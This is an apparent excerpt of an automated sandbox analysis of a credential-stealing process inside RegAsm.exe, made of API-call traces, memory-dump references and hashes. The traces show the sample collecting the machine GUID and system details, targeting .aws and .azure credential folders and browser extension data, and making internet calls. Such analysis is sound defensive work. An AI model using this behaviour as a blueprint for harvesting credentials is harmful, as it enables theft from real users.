                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2737972104-0
                                                                                    • Opcode ID: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                                    • Instruction ID: b48a0b941aae4b8094d1842ee2058a608b59a9df84dda5b7ed82bcf6dbc203b8
                                                                                    • Opcode Fuzzy Hash: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                                    • Instruction Fuzzy Hash: D6413CB1800119AFDB20EBA0DC45FEE7BBDFB45304F10447AFA15B2191D7385A498BA5
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 0041043B
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NeB,?,?,00000000), ref: 00410457
                                                                                    • RegQueryValueExA.KERNEL32(NeB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                    • CharToOemA.USER32(?,?), ref: 00410493
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CharOpenQueryValuememset
                                                                                    • String ID: MachineGuid$NeB$SOFTWARE\Microsoft\Cryptography
                                                                                    • API String ID: 1728412123-1973151993
                                                                                    • Opcode ID: 8a42b9606ce94e91a3aee8c6c2ec702ea9be6fa22a3d7d9db661520a3802ec5d
                                                                                    • Instruction ID: e049fcdf3dccc2042a1c1aa5727c33f1d227b0b17948d6a14ccc4f9ac1de0051
                                                                                    • Opcode Fuzzy Hash: 8a42b9606ce94e91a3aee8c6c2ec702ea9be6fa22a3d7d9db661520a3802ec5d
                                                                                    • Instruction Fuzzy Hash: 8A014F7590421DFFEB10DB90DC89FEAB77CEB18708F5000A5B644E2051EAB45FC88B60
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00416964
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 004134FD: _EH_prolog.MSVCRT ref: 00413502
                                                                                      • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32(74DD0000,00416AAC), ref: 00417659
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417670
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417687
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041769E
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176B5
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176CC
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176E3
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176FA
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417711
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417728
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041773F
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417756
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041776D
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417784
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041779B
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177B2
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177C9
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177E0
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177F7
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041780E
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417825
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041783C
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417853
                                                                                      • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041786A
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,5A&6A,?,004265BB,00000000,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064), ref: 00416B55
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0041390C: _EH_prolog.MSVCRT ref: 00413911
                                                                                      • Part of subcall function 0041390C: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                                      • Part of subcall function 00413295: _EH_prolog.MSVCRT ref: 0041329A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C3A
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C56
                                                                                      • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                                      • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                      • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                      • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                      • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                      • Part of subcall function 00403AF5: _EH_prolog.MSVCRT ref: 00403AFA
                                                                                      • Part of subcall function 00403AF5: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                                      • Part of subcall function 00403AF5: StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                                      • Part of subcall function 00411CD8: _EH_prolog.MSVCRT ref: 00411CDD
                                                                                      • Part of subcall function 00411CD8: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
                                                                                      • Part of subcall function 00411CD8: ExitProcess.KERNEL32 ref: 00411D0A
                                                                                      • Part of subcall function 0040ED08: _EH_prolog.MSVCRT ref: 0040ED0D
                                                                                      • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                                      • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                                      • Part of subcall function 0040514C: _EH_prolog.MSVCRT ref: 00405151
                                                                                      • Part of subcall function 0040514C: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                      • Part of subcall function 0040514C: StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                      • Part of subcall function 004117C4: _EH_prolog.MSVCRT ref: 004117C9
                                                                                      • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 004117F0
                                                                                      • Part of subcall function 004117C4: StrCmpCA.SHLWAPI(00000000,00426570,?,?,?,?,00416EC0), ref: 00411821
                                                                                      • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 00411882
                                                                                      • Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB
                                                                                      • Part of subcall function 004165D9: _EH_prolog.MSVCRT ref: 004165DE
                                                                                      • Part of subcall function 004165D9: lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                      • Part of subcall function 004165D9: lstrcat.KERNEL32(?), ref: 0041663F
                                                                                      • Part of subcall function 00416791: _EH_prolog.MSVCRT ref: 00416796
                                                                                      • Part of subcall function 00416791: memset.MSVCRT ref: 004167B6
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 004167DC
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.azure\), ref: 004167F9
                                                                                      • Part of subcall function 00416791: memset.MSVCRT ref: 00416834
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 0041685F
                                                                                      • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.aws\), ref: 0041687C
                                                                                      • Part of subcall function 00416791: memset.MSVCRT ref: 004168B7
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$memset$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSystemTimeVolumeWindows
                                                                                    • String ID: 5A&6A
                                                                                    • API String ID: 1955031769-2983527881
                                                                                    • Opcode ID: f56475e3e9353e3f899919c66131b9dca8b7c1d3b1fcd2b89d564be33ac666e9
                                                                                    • Instruction ID: edbb1815c7422c7d311f49e837a4d97797ab122b1f4c92a9abc43992aef21044
                                                                                    • Opcode Fuzzy Hash: f56475e3e9353e3f899919c66131b9dca8b7c1d3b1fcd2b89d564be33ac666e9
                                                                                    • Instruction Fuzzy Hash: 8C4242B1D00358AADF10EBE5C946BDEBB78AF15304F5041AEF54573281DB781B888BA7
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00406190
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                    Similarity
                                                                                    • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                                    • String ID:
                                                                                    • API String ID: 3869837436-0
                                                                                    • Opcode ID: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                    • Instruction ID: 909566f9f53506b5aa2d8709c9cb46b640c87a2d020782bf56f99dd61eaf9922
                                                                                    • Opcode Fuzzy Hash: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                    • Instruction Fuzzy Hash: 6E218B70A00115ABDB20AFA4DC48EAFBBB9FF95710F20056EF952E62D4D7389911CB64
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 0040FF8F
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                                    • wsprintfA.USER32 ref: 0040FFDC
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                    • String ID: %d MB$@
                                                                                    • API String ID: 3644086013-3474575989
                                                                                    • Opcode ID: d58cec7bb25a44c408c3687956696a67a71d0eb3ae1938313e2b8797632a6eaa
                                                                                    • Instruction ID: ca080bb329355c7b2013afa2bdf3b2efff8528aa9c5ce76f1778211d5c0869c6
                                                                                    • Opcode Fuzzy Hash: d58cec7bb25a44c408c3687956696a67a71d0eb3ae1938313e2b8797632a6eaa
                                                                                    • Instruction Fuzzy Hash: 8AF036B5A00218ABE7149BA4DC4AF7E76BEEB45705F400039F702E61C0D7B4D8058769
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415CAA
                                                                                    • memset.MSVCRT ref: 00415CD6
                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00000000), ref: 00415CF3
                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00415D13
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415D42
                                                                                    • lstrcat.KERNEL32(?), ref: 00415D55
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prologOpenQueryValuememset
                                                                                    • String ID:
                                                                                    • API String ID: 2333602472-0
                                                                                    • Opcode ID: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                                    • Instruction ID: b1237888a7669b0395c9cdb9a6d9471705cae356a33a5f6a680b3cc5b253afb1
                                                                                    • Opcode Fuzzy Hash: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                                    • Instruction Fuzzy Hash: 8F419DB1D4021DABCF10EFA0DC86EDD7B7DAF18344F00456AB618A2191E7399A858BD2
                                                                                    APIs
                                                                                      • Part of subcall function 00417330: LoadLibraryA.KERNEL32(kernel32.dll,00417262), ref: 00417335
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041737A
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417391
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173A8
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173BF
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173D6
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173ED
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417404
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041741B
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417432
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417449
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417460
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417477
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041748E
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174A5
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174BC
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174D3
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174EA
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417501
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417518
                                                                                      • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041752F
                                                                                      • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417540
                                                                                      • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417551
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
                                                                                      • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
                                                                                      • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004172D5
                                                                                    • Sleep.KERNEL32(00001B58), ref: 004172E0
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00426B18,?,00000000,004265C7), ref: 004172F1
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417307
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00417315
                                                                                    • ExitProcess.KERNEL32 ref: 0041731C
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1043047581-0
                                                                                    • Opcode ID: 113881885c3839af2b79a56db40bcd2305469b038b667f9b69e4ccdc7c5ab35c
                                                                                    • Instruction ID: d94f923eae08acc0ec9c25e643b9a8e0192b3615959a138ccc40586fc2a64efe
                                                                                    • Opcode Fuzzy Hash: 113881885c3839af2b79a56db40bcd2305469b038b667f9b69e4ccdc7c5ab35c
                                                                                    • Instruction Fuzzy Hash: 38113D71900019BBCB11FBE2DD6ADEEB77DAE55304B50007EF502B24E1DF386A09CA69
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00403A59
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                    • InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    Similarity
                                                                                    • API ID: CrackH_prologInternetlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 503950642-0
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040B1E5
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00425F30,00425C3B), ref: 0040B2A6
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040B2C2
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040AFAF: _EH_prolog.MSVCRT ref: 0040AFB4
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                    • API String ID: 2813378046-3310892237
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004064EA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00425B9C,?,?,?,00425B97,?), ref: 004065A7
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                    • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00425BA0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425B9B), ref: 0040661F
                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 0040663A
                                                                                    Strings
                                                                                    • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040659B, 004065A0, 004065BA
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                    • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                    • API String ID: 757424748-3463377506
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040C18B
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
